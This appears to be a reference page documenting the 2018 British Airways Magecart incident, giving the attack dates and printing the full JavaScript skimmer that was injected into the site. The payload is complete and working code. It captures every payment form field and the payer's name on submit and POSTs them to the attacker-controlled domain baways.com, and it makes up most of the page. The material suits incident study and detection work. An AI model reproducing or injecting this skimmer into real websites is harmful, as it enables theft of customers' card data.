British Airways magecart skimmer

This payload was injected into a JavaScript resource and captured payment data before sending it to a third party URL https://baways.com/gateway/app/dataprocessing/api (Malicious/Dead).

The website was affected from August 21, 2018 to September 5, 2018.


References permalink

Payload permalink

window.onload = function() {
jQuery(".submitButton").bind("mouseup touchend", function(t) {
var n = {};
jQuery("#paymentForm")
.serializeArray()
.map(function(a) {
n[a.name] = a.value;
});
var e = document.getElementById('personPaying').innerHTML;
n.person = e;
var t = JSON.stringify(n);
setTimeout(function() {
jQuery.ajax({
type: "POST",
async: !0,
url: "https://baways.com/gateway/app/dataprocessing/api",
data: t,
dataType: "application/json"
});
}, 500);
});
};